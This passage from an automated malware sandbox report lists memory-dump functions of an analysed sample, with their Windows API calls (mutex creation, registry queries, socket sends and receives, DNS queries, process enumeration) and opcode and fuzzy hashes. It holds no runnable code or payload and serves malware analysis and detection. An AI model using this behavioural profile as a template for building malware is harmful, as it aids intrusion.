              • GetExitCodeProcess.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0EAC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: 09c033fd42b51609963e813cdc1b7183a4520d0b7cc33b3130cbb576b6b473d3
              • Instruction ID: bcf7a27efd9d3b62c81a3da649a23e498efa54bb9501967ee4703f628506e057
              • Opcode Fuzzy Hash: 09c033fd42b51609963e813cdc1b7183a4520d0b7cc33b3130cbb576b6b473d3
              • Instruction Fuzzy Hash: 5331B471509384AFEB12CB25DC55FA6BFA8EF46710F0984DAE9848F1A3D224A908C771
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: b5eb5411712874d27c53ffa6252327aed668a60b184d51fb1b2e0cd1bfc7ba47
              • Instruction ID: ea01519c38043ba7a1a71bba125a191b6e543298de7c1b381fef70ab9349999e
              • Opcode Fuzzy Hash: b5eb5411712874d27c53ffa6252327aed668a60b184d51fb1b2e0cd1bfc7ba47
              • Instruction Fuzzy Hash: 8B3161B1509780AFE722CB25DC85B56FFF8EF06210F08849AE9858B292D375E909C761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 014BABB4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 1e5b2a9c028deaae63cebd4f1440e04a8395feb33519ed97b13dd171a0d0e524
              • Instruction ID: 4471e22c877608a36201f3c444ef6eaea0ad48e13fed7957b53dee62e89a6d74
              • Opcode Fuzzy Hash: 1e5b2a9c028deaae63cebd4f1440e04a8395feb33519ed97b13dd171a0d0e524
              • Instruction Fuzzy Hash: F23195715093846FE722CF25CC84F93BFA8EF06310F18889AE9858B253D264E549CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2104, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 7d2a38c14531f9d11c1af2ebb7020708d9813498f0174455b3ad3e97030c5716
              • Instruction ID: fd65f1f14a982844af90e7d89c90a0e5e088c655940ef158faea85c90cb08708
              • Opcode Fuzzy Hash: 7d2a38c14531f9d11c1af2ebb7020708d9813498f0174455b3ad3e97030c5716
              • Instruction Fuzzy Hash: E03191B2405780AFE722CB55DC45F96FFF8EF06320F08859AE9848B153D365A549CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D29D3, Relevance: 1.6, APIs: 1, Instructions: 87COMMON
              Download Yara Rule
              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2A79
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 9d2a417f0729ce6ee594dffdf7b022c324f01bc823d371de291563eb9e80df9a
              • Instruction ID: 8a78f00c65bf1696788d7f36d553eb0b3d08b237d47bfe59131e8da68347a70c
              • Opcode Fuzzy Hash: 9d2a417f0729ce6ee594dffdf7b022c324f01bc823d371de291563eb9e80df9a
              • Instruction Fuzzy Hash: 67317F71509384AFD722CF25DC54F96FFB8EF46310F0884DAE9849B153D225A949CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAF50, Relevance: 1.6, APIs: 1, Instructions: 87COMMON
              Download Yara Rule
              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 014BAFEA
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 04f1ca9a2edde0d34b0079a26095a44fadc71cf2d46503ad2621afa1e0a30d4e
              • Instruction ID: bdf07baec2f484e31d6053ee5061bcef7f6f830b07ab2d179cbec083eb297825
              • Opcode Fuzzy Hash: 04f1ca9a2edde0d34b0079a26095a44fadc71cf2d46503ad2621afa1e0a30d4e
              • Instruction Fuzzy Hash: 6F31717140E7C06FD3138B258C61B61BFB4EF47610F0A41DBD884CB5A3D128A919C762
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D055C
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 26ae4f8bb91378739f1cea26d5e58b8bb5a36ed998fb2a4233a7aaaa7b50df3d
              • Instruction ID: 0f793e59f06523411d539b5c1349e543fbf91c4d1939a89547b584d481fc8ad5
              • Opcode Fuzzy Hash: 26ae4f8bb91378739f1cea26d5e58b8bb5a36ed998fb2a4233a7aaaa7b50df3d
              • Instruction Fuzzy Hash: 7D317F71509780AFD722CB25DC44F92FFB8AF06310F0885DAE9869B1A3D264E808DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2580, Relevance: 1.6, APIs: 1, Instructions: 82timeCOMMON
              Download Yara Rule
              APIs
              • GetProcessTimes.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D260D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: 12b992a1007c0d7f400988a72e2e46e26f090b4d027f3543ee533bbfc0c0f255
              • Instruction ID: 1d4406b0c7c3863c6887f319b812007be3a3e323d4789d29dad3bc9433bf2d7f
              • Opcode Fuzzy Hash: 12b992a1007c0d7f400988a72e2e46e26f090b4d027f3543ee533bbfc0c0f255
              • Instruction Fuzzy Hash: 8F21A6711093846FD7228F25DC44F66FFB8EF06310F0884ABE985DB153C265A445CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA120, Relevance: 1.6, APIs: 1, Instructions: 82networkCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 014BA1C2
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: aea6f239fc450508a58de7cd05bf069d43497421e0b27db810e58bf0dacb27dc
              • Instruction ID: 133145347cdbd46fc14ea6b05dccaa8769f7399bbbeba7ec8c899d1e03f4b643
              • Opcode Fuzzy Hash: aea6f239fc450508a58de7cd05bf069d43497421e0b27db810e58bf0dacb27dc
              • Instruction Fuzzy Hash: 23219F7140D3C06FD7128B758C51BA6BFB4EF47620F1981DBD9C48F193D225A91ACBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0D2E, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 057D0DAB
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: f9081a62e82f67ec334f745c21d1c566cead37b6f2e1a552aea26a2fe2d9a06a
              • Instruction ID: 4c00e5d4952313886efc330113327ee0c7136468b917765552705f8b39893522
              • Opcode Fuzzy Hash: f9081a62e82f67ec334f745c21d1c566cead37b6f2e1a552aea26a2fe2d9a06a
              • Instruction Fuzzy Hash: AE21C472500304AFEB21CF65DC44F6AFBACEF04320F04886AED859B555D274E5158B71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2BDD, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON
              Download Yara Rule
              APIs
              • WSASend.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2C72
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Send
              • String ID:
              • API String ID: 121738739-0
              • Opcode ID: 657538e0312f99a9188b72ee9b957515e80a28496d790d9c33d05f25fe256374
              • Instruction ID: daf439b22cce20f2cf41a9a4213ca3cf82ed7004b19e7567dc5aeb2e5892ed8f
              • Opcode Fuzzy Hash: 657538e0312f99a9188b72ee9b957515e80a28496d790d9c33d05f25fe256374
              • Instruction Fuzzy Hash: C62195B2404344AFEB228F65DD44FA7BFBCEF45310F0489AAE9859B152D234E505CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2DC8, Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON
              Download Yara Rule
              APIs
              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 057D2E6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: ff835b274504ee46a44c0220ac25ed96d0a9c59217056b2f9431425515f73b82
              • Instruction ID: 830b31c9d3c09433a0db4930c45fb4b7e2815152e1e8325237203356ac134e03
              • Opcode Fuzzy Hash: ff835b274504ee46a44c0220ac25ed96d0a9c59217056b2f9431425515f73b82
              • Instruction Fuzzy Hash: 0721A17290D3C46FD7129B658C51B66BFB4EF47610F0980DBD8848F2A3D224A919CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D17F5, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
              Download Yara Rule
              APIs
              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 057D1896
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Query_
              • String ID:
              • API String ID: 428220571-0
              • Opcode ID: 7cef1fedc959230371945a9b8b6626b150fdc65de18e2f44893a7ecd07623004
              • Instruction ID: cae5656a0138ccbafe6ae18003c026a6b9119502e40400ce7c06d95c86f46fd6
              • Opcode Fuzzy Hash: 7cef1fedc959230371945a9b8b6626b150fdc65de18e2f44893a7ecd07623004
              • Instruction Fuzzy Hash: 9621C77550E3C06FD3138B258C51B62BFB8EF47620F0981CBE8848B593D165A919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 057D0353
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: d320ba5562483abeb36227b4567735a3e3fe3d8d58583da70cc4dae5edd1182a
              • Instruction ID: ea190d2c9788200f7fe92c66c0b1f87d6b9cb6c6727ba901ae5cb6ff25185f5e
              • Opcode Fuzzy Hash: d320ba5562483abeb36227b4567735a3e3fe3d8d58583da70cc4dae5edd1182a
              • Instruction Fuzzy Hash: E821A371009380AFE7228F21DC45FA6FFB8EF06310F0884DAE9848B193D265A949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2022, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
              Download Yara Rule
              APIs
              • OpenFileMappingW.KERNELBASE(?,?), ref: 057D20AD
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileMappingOpen
              • String ID:
              • API String ID: 1680863896-0
              • Opcode ID: f2012fd77fb23eb74bef5116bd3e6aab0a3d95ccce2eac65ea5fc82a457f7333
              • Instruction ID: 01934a0b14f8f4a8d7a8472ac4d8cadf9677ccba564147bcb3e76f94c52e1a54
              • Opcode Fuzzy Hash: f2012fd77fb23eb74bef5116bd3e6aab0a3d95ccce2eac65ea5fc82a457f7333
              • Instruction Fuzzy Hash: 2A2171B1509380AFE721CB25DC45F66FFA8EF05310F18849AE9858B252D375E505CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0985
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 4b7b314daa29663f48cb5531ea59e4255a5ea7e0d20209138692d17d97b1416d
              • Instruction ID: a252ab58ed9b6191e5d66b72105ad611ffc8b462edaf6b2e33e4792cd07a19b8
              • Opcode Fuzzy Hash: 4b7b314daa29663f48cb5531ea59e4255a5ea7e0d20209138692d17d97b1416d
              • Instruction Fuzzy Hash: F521F8B65087846FE7138B25DC44FA6BFB8EF46720F0880DAED849B153D224A905C7B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2CD6, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
              Download Yara Rule
              APIs
              • WSARecv.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2D66
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Recv
              • String ID:
              • API String ID: 4192927123-0
              • Opcode ID: 717df6e0e22e13607ea31f15efe189371dc3020a4d6d48d01ca4a0ba486eefd3
              • Instruction ID: 9d021d1ffd52b680424d610fde70d7984869a82079f6c944a300e074c4e0de1a
              • Opcode Fuzzy Hash: 717df6e0e22e13607ea31f15efe189371dc3020a4d6d48d01ca4a0ba486eefd3
              • Instruction Fuzzy Hash: 3A2181B2404344AFEB228F65DD44FA7FFB8EF45310F04849AE9859B152D234E509CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D18C2, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
              Download Yara Rule
              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 057D194E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: 8ce7fd654895602132904c04579b88bbb62063feff039ae63014590e2e039884
              • Instruction ID: ce67ff1c7bbc94aa10f9ffa3f189b8a48641c4dc6956f1edc56311702a7f9e75
              • Opcode Fuzzy Hash: 8ce7fd654895602132904c04579b88bbb62063feff039ae63014590e2e039884
              • Instruction Fuzzy Hash: 92218D71509780AFE722CF65DC49F66FFB8EF05310F08899EE9858B652D375A408CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 057D0899
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 863884e94a8831ae0011eda6a2da2a19e4fbde4e5eb64f529ef88169847290aa
              • Instruction ID: 08f8435f12c947022ef45af867cf827323fdefd2827b82710486c7e57f927fb0
              • Opcode Fuzzy Hash: 863884e94a8831ae0011eda6a2da2a19e4fbde4e5eb64f529ef88169847290aa
              • Instruction Fuzzy Hash: 10218E71500700AFE721DF65DC48B66FBE8FF08310F04846AE9858B652E375E404DBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 057D045E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: a0ddf4cbb886863049db3e4a70dd7fc47c23931ba8bafd9702b8a929a748b0ad
              • Instruction ID: d09a24a54b1dbcda53c27220f4688dec66d86f7a810056cbccde035c1478f8c0
              • Opcode Fuzzy Hash: a0ddf4cbb886863049db3e4a70dd7fc47c23931ba8bafd9702b8a929a748b0ad
              • Instruction Fuzzy Hash: 8721F272100304AFEB31CF15DC84FB6FBACEF04310F04885AEE858A181E6B4A449CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D09C0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
              Download Yara Rule
              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0A51
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: be3fdb3d8ea7009de2d682d11ea7f2d32854a9c6dd9387e63d5efbd1c0d5a81d
              • Instruction ID: 0897e0fed423c5b05917a91580743c468bbb933596e71caee02041e9e603d5b7
              • Opcode Fuzzy Hash: be3fdb3d8ea7009de2d682d11ea7f2d32854a9c6dd9387e63d5efbd1c0d5a81d
              • Instruction Fuzzy Hash: D8219072409380AFE7228F25DC44F56BFB8EF46314F08849BE9849B153C224A809CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 014BAAB1
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 6846797dfa932a6093f15d0cfbbbd5b10439498efda7eb86da6260a0fbd905a1
              • Instruction ID: bcdb9abd1a897e80cc19fa39c94e905bb8b4a70d8c33945b70d7b902fc12b9a1
              • Opcode Fuzzy Hash: 6846797dfa932a6093f15d0cfbbbd5b10439498efda7eb86da6260a0fbd905a1
              • Instruction Fuzzy Hash: E921CF72500304AEE721CE59CD84FABFBECEF08320F14841AE9419B652E674E5098AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 7f4fc0fc9e29b0777d6a4024738b5a2a2dbbb8923b2abab5ef063db1f582c23c
              • Instruction ID: 07df65275c6954ae16dff27a7f24bd44b28b149f547e9b4ac5f2f0f356ba3844
              • Opcode Fuzzy Hash: 7f4fc0fc9e29b0777d6a4024738b5a2a2dbbb8923b2abab5ef063db1f582c23c
              • Instruction Fuzzy Hash: E9219F71604340AFE720DF69DC89B6AFBE8EF04310F04846AED458B681E775E504CA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
              Download Yara Rule
              APIs
              • CreateDirectoryW.KERNELBASE(?,?), ref: 057D079F
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateDirectory
              • String ID:
              • API String ID: 4241100979-0
              • Opcode ID: 78bf707eb6562fb4f1d9f1ef15f1b95259f37b881267fb09d0ef4fffffff6939
              • Instruction ID: 8d1a0c870fd81d1a6e8a0518ac27838d21cfa3190edadafbbcc26a6c9315f4bb
              • Opcode Fuzzy Hash: 78bf707eb6562fb4f1d9f1ef15f1b95259f37b881267fb09d0ef4fffffff6939
              • Instruction Fuzzy Hash: B92171725093809FDB51CB25DC48B56BFF8EF06214F0984EAE885CF652E224D949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0F0F, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 057D0F9B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 6b101ba6d6454ea0a6b6cdb5e6f3752b1d64f5f77c13f11c0198f2f65aa3efe6
              • Instruction ID: 83c9247c323f90cd2a98ed7ed5ac59a865424379e67253c430e6cf51cef98d8f
              • Opcode Fuzzy Hash: 6b101ba6d6454ea0a6b6cdb5e6f3752b1d64f5f77c13f11c0198f2f65aa3efe6
              • Instruction Fuzzy Hash: 9A21C3715053846FE7218B25DC85FA6FFA8EF05320F18809AFD459B192D2A4A949CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 014BABB4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 879e28d3f697aa412e2b8019a1e59f133a3dac85d03e28d19a2914d90af7b664
              • Instruction ID: 9bcaf236576b625c9191e34028d6ef17116cce0ea705bdad9dfe293e019fc0e8
              • Opcode Fuzzy Hash: 879e28d3f697aa412e2b8019a1e59f133a3dac85d03e28d19a2914d90af7b664
              • Instruction Fuzzy Hash: 50216F72604304AFE721CE19CC84FA7FBECEF04710F14885AEA458B652D674E404CA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2042, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • OpenFileMappingW.KERNELBASE(?,?), ref: 057D20AD
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileMappingOpen
              • String ID:
              • API String ID: 1680863896-0
              • Opcode ID: 20c8e43d8fb3c65af8372fb0a8bd219d5b67a672a9bbe19f98da4c6b1aa024b0
              • Instruction ID: 3fbe010d2ec1b62ddcb6fe89fdbc1a8dae1dd83f572f09d0783acd1b7bd77faf
              • Opcode Fuzzy Hash: 20c8e43d8fb3c65af8372fb0a8bd219d5b67a672a9bbe19f98da4c6b1aa024b0
              • Instruction Fuzzy Hash: 7021AEB5504340AFE721DF29CD85B66FBA8EF04320F18846AED468B242D675E405CA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1380, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D13EC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: f9af814ef95bd2ee9d59fb2a8d1fa0e84ba7e88cdbcf450b5b7868748f399fc8
              • Instruction ID: 9256192f079e8626fe9b87f6e5a97418e989d22eac81cbe6a8fa7b959435ce93
              • Opcode Fuzzy Hash: f9af814ef95bd2ee9d59fb2a8d1fa0e84ba7e88cdbcf450b5b7868748f399fc8
              • Instruction Fuzzy Hash: 842181725093C05FDB128B25DC54B92BFB4AF07224F0984DAEC858F663D2649948CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2142, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 8847150c699bc1f50f63a4f1101add2ea8af7787c819e1573da1691b67a5ff6d
              • Instruction ID: 5d8b3ad080910e9a6b64e29621adbe7d5100b535aa717fad3a3b2e0aeaa62eb9
              • Opcode Fuzzy Hash: 8847150c699bc1f50f63a4f1101add2ea8af7787c819e1573da1691b67a5ff6d
              • Instruction Fuzzy Hash: BF21CD72500340AFE721CF19CC85FAAFBE8EF08320F04845AEA858B642D276A409CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1435, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
              Download Yara Rule
              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,B4FCE2B2,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 057D14A6
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: 2a2e659bd5f772303592a078d482617c62f6c94874e2afd0a0a9589d060b7fe0
              • Instruction ID: 4b7391d6ee25a2624067724f37f3a5f5266c4272e177f06a275ee12ab1a1f1f6
              • Opcode Fuzzy Hash: 2a2e659bd5f772303592a078d482617c62f6c94874e2afd0a0a9589d060b7fe0
              • Instruction Fuzzy Hash: EE214F715093849FD722CB65DC84B92BFF4EF06210F0984EAE985CF162D224A908CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2C02, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
              Download Yara Rule
              APIs
              • WSASend.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2C72
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Send
              • String ID:
              • API String ID: 121738739-0
              • Opcode ID: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction ID: 3d58545e5ae1843ece320089873e6f925b64a06b1e08dddaf133445618883e1e
              • Opcode Fuzzy Hash: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction Fuzzy Hash: 83117272500304AFEB21CF65DD44FA6FBA8EF08320F04886AED459B556D674E505CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D18E2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
              Download Yara Rule
              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 057D194E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: ef58362876006dd97f8ddf8b3e1cb2419538ecd1a2d3cc8188c9f851743989fb
              • Instruction ID: 2fc418e8857f03bfd5a781e93b1f93f975d2b2fcbb44fe00fc02f9e59b442e98
              • Opcode Fuzzy Hash: ef58362876006dd97f8ddf8b3e1cb2419538ecd1a2d3cc8188c9f851743989fb
              • Instruction Fuzzy Hash: BA219D71500740AFEB21CF65DD49B66FBA9EF08320F04886AE9858B652D375A404CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D055C
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: d8504dabb7a7220a1f6b0e723caae01fc2f220487871b5218f64c63e9d05268c
              • Instruction ID: 461da399698682fba941f291f79a7e1b3d6699190ecd84bbc115da91e1356cba
